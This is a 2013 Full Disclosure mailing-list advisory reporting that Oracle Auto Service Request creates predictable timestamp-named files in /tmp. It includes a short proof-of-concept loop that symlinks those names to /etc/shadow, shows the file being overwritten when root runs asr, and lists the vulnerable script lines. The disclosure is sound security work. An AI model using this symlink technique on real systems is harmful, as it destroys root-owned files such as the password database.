Full Disclosure mailing list archives
Oracle Auto Service Request /tmp file clobbering vulnerability
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Fri, 01 Mar 2013 03:55:41 +0000 (GMT)
Oracle Auto Service Request /tmp file clobbering vulnerability http://www.oracle.com/us/support/systems/premier/auto-service-request-155415.html http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm I noticed it creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root owned files if you know when around the time the root administrator will be using this utility. [larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done root executes the asr command: [root@oracle-os-lab01 bin]# ./asr register OR register [-e asr-manager-relay-url]: register ASR unregister : unregister ASR show_reg_status : show ASR registration status test_connection : test connection to Oracle . . . version : show asr script version exit help : display a list of commands ? : display a list of commandsasr>
/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722 root # cat /etc/shadow id State Bundle 68 ACTIVE com.sun.svc.asr.sw_4.3.1 Fragments=69, 70 69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1 Master=68 70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1 Master=68 72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0 Fragments=73 73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0 Master=72 67 ACTIVE com.sun.svc.ServiceActivation_4.3.1Problem code:
The asr binary is a wrapper for a java class, the following snippet of code is where the error lies:/sbin/sh:root@unix-solaris# grep -n tmp asr 409: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
410: file2=/tmp/status2_`date '+%m%d%y%H%M%S'` 411: file3=/tmp/status3_`date '+%m%d%y%H%M%S'` 557: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 681: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 691: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 706: file1=/tmp/parse_jetty_`date '+%m%d%y%H%M%S'` 710: file2=/tmp/parse_jetty_port_`date '+%m%d%y%H%M%S'` 797: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 987: hostnameTempFile=/tmp/status1_`date '+%m%d%y%H%M%S'` 988: tempFile=/tmp/status2_`date '+%m%d%y%H%M%S'`989: tempHostname=/tmp/status3_`date '+%m%d%y%H%M%S'` 1303: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1334: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 1343: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 1344: file2=/tmp/status2_`date '+%m%d%y%H%M%S'` 1345: file3=/tmp/status3_`date '+%m%d%y%H%M%S'` 1405: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'` 2198: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'` This affects the software package on both Solaris and Linux. Vendor notified about a month ago. @_larry0 Larry W. Cashdollarhttp://otiose.dhs.org/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Oracle Auto Service Request /tmp file clobbering vulnerability Larry W. Cashdollar (Feb 28)